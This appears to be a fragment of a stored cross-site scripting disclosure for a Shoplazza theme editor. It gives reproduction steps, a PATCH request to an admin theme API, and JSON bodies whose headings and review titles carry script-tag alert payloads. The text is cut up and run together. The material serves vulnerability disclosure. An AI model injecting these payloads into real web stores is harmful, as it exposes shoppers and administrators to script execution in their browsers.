text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>"[...]// HTTP response showing unsanitized XSS payload HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>[...]Stored XSS #7:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>[...]HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>"[...]

Tag

#ubuntu